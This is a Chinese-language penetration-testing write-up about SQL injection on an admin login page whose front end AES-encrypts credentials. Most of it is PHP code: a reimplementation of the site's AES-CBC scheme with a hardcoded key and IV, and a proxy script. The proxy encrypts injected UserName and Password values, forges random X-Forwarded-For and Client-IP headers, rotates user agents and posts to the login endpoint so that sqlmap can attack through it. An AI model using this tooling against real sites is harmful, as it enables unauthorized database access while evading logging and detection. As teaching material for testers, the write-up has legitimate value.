0x01 概要

站点:http://aa.test.com:8088/Admin/Login
1.jpg
这样看起来是一个挺正常的界面,测试一下发现存在注入

2.jpg
3.jpg
很清楚的可以看到两张图片是有明显的区别的,说明有注入

抓包时发现!!!!
4.jpg

0x02 查看前端加密方式

前端加密的话,那就只需要找到对应前端加密脚本即可
5.jpg

6.jpg

7.jpg

8.jpg

0x03 编码对应解密脚本

9.jpg

  1. # AES 加解密脚本
  2. <?php
  3. /**
  4. * AES/CBC/PKCS5Padding模式 加密解密
  5. */
  6. class Crypt {
  7. /**
  8. * [$cipher 加密模式]
  9. * @var [type]
  10. */
  11. private $cipher = MCRYPT_RIJNDAEL_128;
  12. private $mode = MCRYPT_MODE_CBC;
  13. /**
  14. * [$key 密匙]
  15. * @var string
  16. */
  17. private $secret_key = '123456789ABCDEFG123456789ABCDEFG';
  18. /**
  19. * [$iv 偏移量]
  20. * @var string
  21. */
  22. private $iv = '123456789ABCDEFG';
  23. function setCipher($cipher=''){
  24. $cipher && $this->cipher = $cipher;
  25. }
  26. function setMode($mode=''){
  27. $mode && $this->mode = $mode;
  28. }
  29. function setSecretKey($secret_key=''){
  30. $secret_key && $this->secret_key = $secret_key;
  31. }
  32. function setIv($iv=''){
  33. $iv && $this->iv = $iv;
  34. }
  35. //加密
  36. function encrypt($str)
  37. {
  38. $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );
  39. $str = $this->pkcs5Pad ( $str, $size );
  40. $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);
  41. //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值
  42. $data=strtolower(bin2hex($data));
  43. return $data;
  44. }
  45. //解密
  46. function decrypt($str)
  47. {
  48. $str = $this->hex2bin( strtolower($str));
  49. $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );
  50. $str = $this->pkcs5Unpad( $str );
  51. return $str;
  52. }
  53. //bin2hex还原
  54. private function hex2bin($hexData)
  55. {
  56. $binData = "";
  57. for($i = 0; $i < strlen ( $hexData ); $i += 2)
  58. {
  59. $binData .= chr(hexdec(substr($hexData, $i, 2)));
  60. }
  61. return $binData;
  62. }
  63. //PKCS5Padding
  64. private function pkcs5Pad($text, $blocksize)
  65. {
  66. $pad = $blocksize - (strlen ( $text ) % $blocksize);
  67. return $text . str_repeat ( chr ( $pad ), $pad );
  68. }
  69. private function pkcs5Unpad($text)
  70. {
  71. $pad = ord ( $text {strlen ( $text ) - 1} );
  72. if ($pad > strlen ( $text ))
  73. return false;
  74. if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)
  75. return false;
  76. return substr ( $text, 0, - 1 * $pad );
  77. }
  78. }
  79. echo (new Crypt())->encrypt('111');

10.jpg

可以看得到一致的,那就可以正常注入了

  1. # 注入脚本
  2. <?php
  3. /**
  4. * AES/CBC/PKCS5Padding模式 加密解密
  5. */
  6. class Crypt {
  7. /**
  8. * [$cipher 加密模式]
  9. * @var [type]
  10. */
  11. private $cipher = MCRYPT_RIJNDAEL_128;
  12. private $mode = MCRYPT_MODE_CBC;
  13. /**
  14. * [$key 密匙]
  15. * @var string
  16. */
  17. private $secret_key = '123456789ABCDEFG123456789ABCDEFG';
  18. /**
  19. * [$iv 偏移量]
  20. * @var string
  21. */
  22. private $iv = '123456789ABCDEFG';
  23. function setCipher($cipher=''){
  24. $cipher && $this->cipher = $cipher;
  25. }
  26. function setMode($mode=''){
  27. $mode && $this->mode = $mode;
  28. }
  29. function setSecretKey($secret_key=''){
  30. $secret_key && $this->secret_key = $secret_key;
  31. }
  32. function setIv($iv=''){
  33. $iv && $this->iv = $iv;
  34. }
  35. //加密
  36. function encrypt($str)
  37. {
  38. $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );
  39. $str = $this->pkcs5Pad ( $str, $size );
  40. $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);
  41. //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值
  42. $data=strtolower(bin2hex($data));
  43. return $data;
  44. }
  45. //解密
  46. function decrypt($str)
  47. {
  48. $str = $this->hex2bin( strtolower($str));
  49. $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );
  50. $str = $this->pkcs5Unpad( $str );
  51. return $str;
  52. }
  53. //bin2hex还原
  54. private function hex2bin($hexData)
  55. {
  56. $binData = "";
  57. for($i = 0; $i < strlen ( $hexData ); $i += 2)
  58. {
  59. $binData .= chr(hexdec(substr($hexData, $i, 2)));
  60. }
  61. return $binData;
  62. }
  63. //PKCS5Padding
  64. private function pkcs5Pad($text, $blocksize)
  65. {
  66. $pad = $blocksize - (strlen ( $text ) % $blocksize);
  67. return $text . str_repeat ( chr ( $pad ), $pad );
  68. }
  69. private function pkcs5Unpad($text)
  70. {
  71. $pad = ord ( $text {strlen ( $text ) - 1} );
  72. if ($pad > strlen ( $text ))
  73. return false;
  74. if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)
  75. return false;
  76. return substr ( $text, 0, - 1 * $pad );
  77. }
  78. }
  79. class SqlCurl
  80. {
  81. public function curlRequest($url, $post = [], $cookie = '', $referurl = '')
  82. {
  83. if (!$referurl) {
  84. $referurl = 'https://www.baidu.com';
  85. }
  86. $header = array(
  87. 'CLIENT-IP:' . $this->getIp(),
  88. 'X-FORWARDED-FOR:' . $this->getIp(),
  89. 'HTTP_CLIENT_IP:' .$this->getIp(),
  90. 'HTTP_X_FORWARDED_FOR' . $this->getIp(),
  91. 'REMOTE_ADDR:' . $this->getIp(),
  92. 'Content-Type:application/x-www-form-urlencoded',
  93. 'X-Requested-With:XMLHttpRequest',
  94. );
  95. $curl = curl_init();
  96. curl_setopt($curl, CURLOPT_URL, $url);
  97. //随机浏览器useragent
  98. curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());
  99. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  100. curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
  101. curl_setopt($curl, CURLOPT_REFERER, $referurl);
  102. curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
  103. if ($post) {
  104. curl_setopt($curl, CURLOPT_POST, 1);
  105. curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
  106. }
  107. if ($cookie) {
  108. curl_setopt($curl, CURLOPT_COOKIE, $cookie);
  109. }
  110. curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  111. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  112. $data = curl_exec($curl);
  113. if (curl_errno($curl)) {
  114. return curl_error($curl);
  115. }
  116. curl_close($curl);
  117. return $data;
  118. }
  119. private function getIp()
  120. {
  121. return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);
  122. }
  123. private function agentArry()
  124. {
  125. $agentarry = [
  126. //PC端的UserAgent
  127. "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  128. "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
  129. "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
  130. "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
  131. "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
  132. "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
  133. "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
  134. "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  135. "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
  136. "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
  137. "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
  138. "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
  139. "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
  140. "傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
  141. "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
  142. "世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
  143. "世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
  144. "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
  145. "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
  146. "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
  147. "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
  148. //移动端口
  149. "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
  150. "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
  151. "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
  152. "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  153. "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  154. "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
  155. "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
  156. "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
  157. "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
  158. "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
  159. "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
  160. "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
  161. "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
  162. ];
  163. return $agentarry[array_rand($agentarry, 1)];
  164. }
  165. }
  166. // http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#
  167. $data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);
  168. $data['Password'] = (new Crypt())->encrypt($_GET['Password']);
  169. echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);

0x04 Sqlmap正常注入

11.jpg

12.jpg